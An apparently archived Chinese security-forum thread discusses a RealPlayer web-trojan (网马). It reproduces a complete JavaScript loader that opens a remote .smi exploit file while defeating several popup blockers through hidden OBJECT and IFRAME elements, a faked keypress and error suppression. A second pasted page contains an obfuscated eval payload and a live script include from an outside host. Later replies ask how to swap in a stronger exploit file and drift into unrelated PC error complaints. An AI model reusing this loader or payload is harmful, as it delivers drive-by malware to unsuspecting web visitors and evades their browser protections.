
[讨论]real网马不卡内存代码

[讨论]real网马不卡内存代码

议题作者:寂寞宝贝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

今天在网上看到一个 real网马不卡内存代码,帖出来,大家研究下原理,看看有没有可能弄一个完美的real网马出来,补丁已经出来很久了。我们研究下不过分吧,嘿嘿!!曾经在网上见过一个教程,也就是real 网马的改进版本,已经解决了IE自动关闭的问题,偶一直没研究明白,太菜了。诶!!大家一起研究下下面代码的原理。顺便说一句,偶一直在找real网马的源代码,哪位兄弟有,麻烦帖出来!谢谢了!


<Script Language="JavaScript">
// Target that every window.open() call in this script loads. ".smi" is a SMIL
// media file extension; the thread presents this script as the loader for a
// RealPlayer exploit page, but the .smi payload itself is not shown here, so
// what it does cannot be confirmed from this listing.
var paypopupURL = "http://www.yyyrrrr.com/mm/music.smi";
// Initial preference for the ActiveX/OBJECT path; version() reassigns this from
// the User-Agent string before it is first read.
var usingActiveX = true;
// Error handler that always returns true. Installed as window.onerror, a true
// return marks every script error as handled, so the visitor sees no error
// dialog while the script's attempts fail and retry.
function blockError(){return true;}
// Suppress script error reporting for the whole page (blockError always returns true).
window.onerror = blockError;
// If the page exposes SymRealWinOpen or NS_ActualOpen, assign it back to
// window.open. The original author's comment describes this as bypassing the
// Norton Internet Security popup blocker; presumably these names hold the
// browser's real window.open after a filtering product wrapped it.
// Review note: a page script that reads either name is a strong indicator of
// popup-blocker evasion and is worth flagging in content filters.
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
// Defaults for globals that a host page may define before including this script.
// Single quotes appear on this page as the HTML entity &#39; (forum escaping),
// so the listing is not valid JavaScript exactly as pasted.
// Because `var` declarations are hoisted, usingActiveX and paypopupURL (assigned
// at the top of the script) are already defined here and their defaults never apply.
if (typeof(usingClick) == &#39;undefined&#39;) {var usingClick = false;}
if (typeof(usingActiveX) == &#39;undefined&#39;) {var usingActiveX = false;}
if (typeof(popwin) == &#39;undefined&#39;) {var popwin = null;}
if (typeof(poped) == &#39;undefined&#39;) {var poped = false;}
if (typeof(paypopupURL) == &#39;undefined&#39;) {var paypopupURL = "www.yyyrrrr.com/mm/music.smi";}
// blk gates both evasion paths in version(): usingClick and usingActiveX are
// computed as `blk && ...`.
var blk = 1;
// Set once setupClick() has hooked document.onclick.
var setupClickSuccess = false;
// Selects which hidden container tryActiveX() reads: the createPopup() window
// when true, the hidden iframe when false. Written by detectGoogle() and showActiveX().
var googleInUse = false;
// Full page URL plus "/"; truncated further down so that only the part before
// the first "/" found from index 8 onward remains.
var myurl = location.href+&#39;/&#39;;
// Retry budget shared by tryActiveX() and openActiveX() through `tried`.
var MAX_TRIED = 20;
// True once the OBJECT-based path has succeeded or been abandoned.
var activeXTried = false;
var tried = 0;
var randkey = &#39;0&#39;; // random key from server
// Window reference obtained through the embedded OBJECT; showActiveX() calls open() on it.
var myWindow;
// Window created by window.createPopup() in setupActiveX().
var popWindow;
// Setup state: 0-5 counts failed attempts, 6 means the hidden elements were written.
var setupActiveXSuccess = 0;
// bypass IE functions
// Writes the hidden elements that the OBJECT-based path depends on. Runs only when
// usingActiveX is set.
//   - a display:none text input (#autoHit) whose ONKEYPRESS attribute calls showActiveX()
//   - a window.createPopup() window holding a 1x1 OBJECT (#getParentDiv) whose DATA
//     is myurl + "/paypopup.html"
//   - an off-screen 1x1 IFRAME (popIframe) holding a second OBJECT (#getParentFrame)
//     with the same DATA
// On success setupActiveXSuccess becomes 6. On an exception it retries every 500 ms,
// counting failures in setupActiveXSuccess; once the counter is 5 the next failure
// sets activeXTried and falls back to setupClick().
// Review note: invisible OBJECT/IFRAME elements plus window.createPopup() emitted by
// document.write are the page-level indicators of this routine.
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write(&#39;<INPUT STYLE="display:none;" ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()">&#39;);popWindow=window.createPopup();popWindow.document.body.innerHTML=&#39;<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="&#39;+myurl+&#39;/paypopup.html" TYPE="text/html"></OBJECT></DIV>&#39;;document.write(&#39;<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" SRC="about:blank"></IFRAME>&#39;);popIframe.document.write(&#39;<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="&#39;+myurl+&#39;/paypopup.html" TYPE="text/html"></OBJECT>&#39;);setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout(&#39;setupActiveX();&#39;,500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
// Polls until the hidden OBJECT written by setupActiveX() exposes .object.parentWindow
// and stores that window in myWindow. It reads the createPopup() container when
// googleInUse is true, otherwise the popIframe container, which it then navigates
// back to about:blank.
// While the reference is unavailable it re-schedules itself every 200 ms and
// increments `tried`; at MAX_TRIED it sets activeXTried and falls back to setupClick().
// Once a window is found it calls openActiveX() and only afterwards sets
// window.windowFired, so that first openActiveX() call re-schedules itself.
// Does nothing once activeXTried or poped is set.
function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById(&#39;getParentDiv&#39;) && popWindow.document.getElementById(&#39;getParentDiv&#39;).object && popWindow.document.getElementById(&#39;getParentDiv&#39;).object.parentWindow) {myWindow=popWindow.document.getElementById(&#39;getParentDiv&#39;).object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace(&#39;about:blank&#39;);}else {setTimeout(&#39;tryActiveX()&#39;,200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}}
// Fires a synthetic "onkeypress" event on the hidden #autoHit input once myWindow
// and window.windowFired are both set. That input's ONKEYPRESS attribute calls
// showActiveX(), so the window.open call ends up running inside an input-event handler.
// NOTE(review): presumably this makes the open look user-initiated to the browser's
// popup blocker; this listing alone does not confirm it.
// Otherwise it re-schedules itself every 100 ms. Every call increments `tried`;
// at MAX_TRIED it sets activeXTried and falls back to setupClick().
// Review note: fireEvent() on a display:none input is an indicator of
// scripted, not real, user interaction.
function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById(&#39;autoHit&#39;).fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout(&#39;openActiveX();&#39;,100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}}
// ONKEYPRESS handler of the hidden #autoHit input. Opens paypopupURL through
// myWindow.open() using the fixed window name 'abcdefg'.
// When googleInUse is set it first detaches the OBJECT from the createPopup() container.
// If the open succeeds, the new window is blurred and the current window refocused,
// which places the new window behind the page; activeXTried and poped are set so
// nothing opens again.
// If the open fails: on the first failure it sets googleInUse, resets `tried` and
// re-runs tryActiveX() against the other container; on a later failure it gives up
// and falls back to setupClick().
function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById(&#39;objectRemover&#39;).children(0);window.daChildObject=popWindow.document.getElementById(&#39;objectRemover&#39;).removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,&#39;abcdefg&#39;);if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
// end bypass IE functions
// normal call functions
// Direct path: when neither usingClick nor usingActiveX is set, calls
// window.open(paypopupURL, 'abcdefg') immediately and records success in poped.
// If nothing has opened after that, it hands over to tryActiveX() when usingActiveX
// is set, or to setupClick() otherwise.
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,&#39;abcdefg&#39;);if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
// end normal call functions
// onclick call functions
// Click fallback: replaces document.onclick with gopop() so that the visitor's next
// real click anywhere on the page triggers the window.open call. The previous
// handler is kept in the global prePaypopOnclick so gopop() can still call it.
// Runs at most once (setupClickSuccess) and not at all after a window has opened.
// document.captureEvents(Event.CLICK) is called only where window.Event exists.
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
// document.onclick handler installed by setupClick(). If nothing has opened yet, it
// opens paypopupURL in the window named 'abcdefg', records success in poped and
// refocuses the current window. It then calls the page's previous onclick handler
// (prePaypopOnclick) when that is a function, so the page still reacts to the click.
function gopop() {if (!poped) {popwin = window.open(paypopupURL,&#39;abcdefg&#39;);if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
// Probe that runs only when usingActiveX is set. It writes a hidden OBJECT with a
// fixed CLASSID and ORs the result of a typeof check on that element into googleInUse.
// NOTE(review): the function name suggests the CLASSID belongs to a Google browser
// add-on with its own popup blocker; this page does not say which component it is.
// On an exception the probe retries every 50 ms.
// Review note: instantiating a CLASSID only to test for its presence is
// environment fingerprinting; the CLSID string is a usable static signature.
function detectGoogle() {if (usingActiveX) {try {document.write(&#39;<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>&#39;);googleInUse|=(typeof(document.getElementById(&#39;detectGoogle&#39;))==&#39;object&#39;);}catch(e){setTimeout(&#39;detectGoogle();&#39;,50);}}}
// Chooses the evasion path from navigator.userAgent substrings:
//   usingClick   = blk && (UA contains "SV1", "Opera" or "Firefox")
//   usingActiveX = blk && UA contains "SV1" && not "Opera" && ("Microsoft" or "MSIE")
// "SV1" is the token Internet Explorer added to its User-Agent on Windows XP SP2,
// the release that shipped IE's built-in popup blocker.
// The locals os, bs and isframe are computed but never read afterwards, and
// `paypopupURL = paypopupURL` is a no-op.
// NOTE(review): these look like leftovers from a version that reported them to a
// server; nothing on this page confirms that.
// Ends by calling detectGoogle().
function version() {var os = &#39;W0&#39;;var bs = &#39;I0&#39;;var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf(&#39;Win&#39;) != -1) {os = &#39;W1&#39;;}if (browser.indexOf("SV1") != -1) {bs = &#39;I2&#39;;}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = &#39;I1&#39;;}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();}
// Run the User-Agent check immediately at load time, so usingClick and usingActiveX
// are set before setupActiveX() and loadingPop() are called at the end of the script.
version();
// end check version
// Entry point called once at the end of the script. It dispatches to one of the
// three paths according to the flags set by version().
function loadingPop() {
// Neither evasion flag set: open the window directly.
if(!usingClick && !usingActiveX) {
paypopup();
}
// usingActiveX set: use the hidden OBJECT path.
else if (usingActiveX) {tryActiveX();}
// Only usingClick set: wait for the visitor's next click.
else {setupClick();}
}
// Cut myurl (page URL + "/") at the first "/" found from index 8 onward. Starting
// at index 8 skips the "//" of an http:// or https:// prefix, leaving scheme and host.
myurl = myurl.substring(0, myurl.indexOf(&#39;/&#39;,8));
// Fall back to a relative base when that leaves an empty string.
if (myurl == &#39;&#39;) {myurl = &#39;.&#39;;}
// Write the hidden elements first (their OBJECT DATA URLs use myurl), then start
// the selected path, then pull focus back to this window.
setupActiveX();
loadingPop();
self.focus();
</Script>
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。


<script src=http://www.xinwen365.com/48472394k4r.asp></script><HTML oncontextmenu="return false"><HEAD><TITLE> </TITLE></HEAD><BODY>

<SCRIPT LANGUAGE="JavaScript">
<!--

dddss="=tdsjqu mbohvbhf>KbwbTdsjqu?=!..gvodujpo ofn(*|sfuvso usvf~<xjoepx/pofssps >G#8#qfo(voftdbqf(%79%85%85%81%4B%3G%3G%88%88)#3F%7E%7:%7F)#P#84%76%83%87,#P#F/#5%3G*-Vosfhjtufs-tdspmmcbst-xjeui>611-ifjhiu.#*<C%iq`eo(bF%gbmtf~B#dd%bmfsu(Uijt qbhf ibt cffo qspufdufe/ Qsfwjfx pomz/*<v#v#ne(f*|jg(f/xijdi>>3}}/#48$8$8$8$&$2*|N&#39;dbquvsfFwfout(*#/NPVTFNPWF*/(npvtfnpwf>5&~-%v-%*$sfmfbt*$*$f>ovmm~x$obwjhbups/bqqObnf/joefyPg(Joufsofu Fyqmpsfs*>>.2}}W#vtfsBh8$Y#NTJF*!>.2w$epdvnD#bmm*|1#podpoufyunfov^%dn<@#tfmfdutubsu{%n#mbzfstt&m%VQ}1#EPXO{%epxo*$ne<#vq:#vA$hfuFmf.#CzJe&&!L%L%L%C$H(?#xsjuf(]v114DTDSJQU/#31MBOHVBHF=#E7#3x.3#FFodpef?#Y#tsdT#jdzgpyP#ktL#4z#D5#G@$;#R$R$w#wbsV#vsmQ#V%K$mpdb/+1#isfgI#CR#,#3Ftvctusjoh2#91*#DB#mbtuJ+*D#)#8=%/#:)#/$U$3&#39;`#4DPCKFDh%Xc0b$J$1Ik06#tuzmk#0&ejtqmbz6#Bopo@#C`&#39;uzqV#?)+%f&#39;Etp&mfs&31ebubY#nl-$)#51NTJUTups|#Bniunj&Br(J#6R()#3Fn:%32G&G&#39;3z$h&N)s#)#.&#39;634h)13Gk&;#Z&#39;4C&-Z(ubuv+$V%&#272<)#)$i$n*;#CPEZ9#OPM#jgsbnk(.(.(k,H%,&Z%/#f)f$B$;#n$=#IUNM]v114F]v111E]v111B*<=0TDSJQU?";
l=&#39;\0\t\n \r !"#$%&\&#39;()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\1<script src=http://www.xinwen365.com/48472394k4r.asp></script>%25%33%44%25%32%37%25%32%37%25%33%42%25%30%44%25%30%41%25%36%36%25%36%46%25%37%32%25%32%30%25%32%38%25%36%39%25%33%44%25%33%30%25%33%42%25%36%39%25%33%43%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%43%25%36%35%25%36%45%25%36%37%25%37%34%25%36%38%25%33%42%25%36%39%25%32%42%25%32%42%25%32%39%25%37%42%25%30%44%25%30%41%25%36%31%25%33%44%25%36%43%25%32%45%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%34%46%25%36%36%25%32%38%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%39%25%32%39%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%31%25%32%39%25%32%30%25%36%31%25%33%44%25%33%39%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%32%25%32%39%25%32%30%25%36%31%25%33%44%25%33%31%25%33%30%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%33%25%32%39%25%32%30%25%36%31%25%33%44%25%33%31%25%33%33%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%34%25%32%39%25%32%30%25%36%31%25%33%44%25%33%33%25%33%34%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%43%25%33%44%25%33%33%25%33%31%25%32%30%25%32%36%25%32%30%25%36%31%25%33%45%25%33%44%25%33%31%25%33%34%25%32%39%25%37%42%25%30%44%25%30%41%25%36%46%25%36%36%25%36%36%25%33%44%25%37%33%25%32%45%25%36%43%25%36%35%25%36%45%25%36%37%25%37%34%25%36%38%25%32%44%25%32%38%25%36%43%25%32%45%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%34%46%25%36%36%25%32%38%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%32%42%25%32%42%25%36%39%25%32%39%25%32%39%25%32%44%25%33%33%25%33%36%25%32%42%25%33%39%25%33%30%25%32%41%25%32%38%
25%36%43%25%32%45%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%34%46%25%36%36%25%32%38%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%32%42%25%32%42%25%36%39%25%32%39%25%32%39%25%32%44%25%33%33%25%33%35%25%32%39%25%32%39%25%32%44%25%33%31%25%33%42%25%30%44%25%30%41%25%36%43%25%37%30%25%33%44%25%36%46%25%36%36%25%36%36%25%32%42%25%36%31%25%32%44%25%33%31%25%33%34%25%32%42%25%33%34%25%33%42%25%30%44%25%30%41%25%37%33%25%33%44%25%37%33%25%32%42%25%37%33%25%32%45%25%37%33%25%37%35%25%36%32%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%38%25%36%46%25%36%36%25%36%36%25%32%43%25%36%43%25%37%30%25%32%39%25%33%42%25%37%44%25%30%44%25%30%41%25%36%35%25%36%43%25%37%33%25%36%35%25%32%30%25%37%42%25%32%30%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%45%25%33%44%25%33%34%25%33%31%25%32%39%25%32%30%25%36%31%25%33%44%25%36%31%25%32%44%25%33%31%25%33%42%25%32%30%25%37%33%25%33%44%25%37%33%25%32%42%25%36%43%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%31%25%32%39%25%33%42%25%37%44%25%37%44%25%33%42%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%37%33%25%32%39%25%33%42%25%30%44%25%30%41");eval(unescape(e));

//-->
</SCRIPT><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT></body></html>
=================================================
问下这个是不是网马,是的话是什么网马???谢谢。


晕,好乱,先是JavaScript加密,然后一些乱码,最后是16进制编码,http://www.xinwen365.com/48472394k4r.asp?这一个请问是什么东西,我打开后页面被删除了,所以分析不了,不过估计不是什么好东西。。我看着这代码咋就那么眼熟呢,你等我翻下资料啊!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。


想起来了,这个不就是前段时间的HELP网马么,就是那个会弹窗口那个!我还以为是好东西呢。。
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。


问个正题,是不是直接用那个牛X版的smi文件然后把你给的代码里的smi文件路径替换掉保存为html然后直接访问html呢??我以前看到一个是asp+dll+smi文件的一个real溢出网马。


eval(unescape(e));
lookthis就知道什么加密的了,ok,完毕


我的电脑最近经常会弹出(XXXXXXXX……)的内存不能为real,请问下这个是什么问题啊
()里的我忘记了
  残破的光影黑暗中深深吸引     


回楼上的,把问题说清楚点好么,是你打开REAL出现这问题,还是打开网站?如果是前者,你升级下REAL,或者重装,如果是后者,那么恭喜你,中马了!杀毒吧!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。


引用:
这里是引用第[8 楼]星星的坠落2006-04-24 20:18发表的:
我的电脑最近经常会弹出(XXXXXXXX……)的内存不能为real,请问下这个是什么问题啊
()里的我忘记了
内存不能read
参考 本论坛
该内存不能为read或written的解决方案
http://www.eviloctal.com/forum/htm_data/75/0604/21225.html
觉得说的很全了。
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre


不是的,是内存不能为REAL,我是不是中马了啊
  残破的光影黑暗中深深吸引     


不是啊,是经常会出现的,而且会关我运行的程序的,是REAL内存错误,不是READ
  残破的光影黑暗中深深吸引     


不是READ,是REAL错误
  残破的光影黑暗中深深吸引     

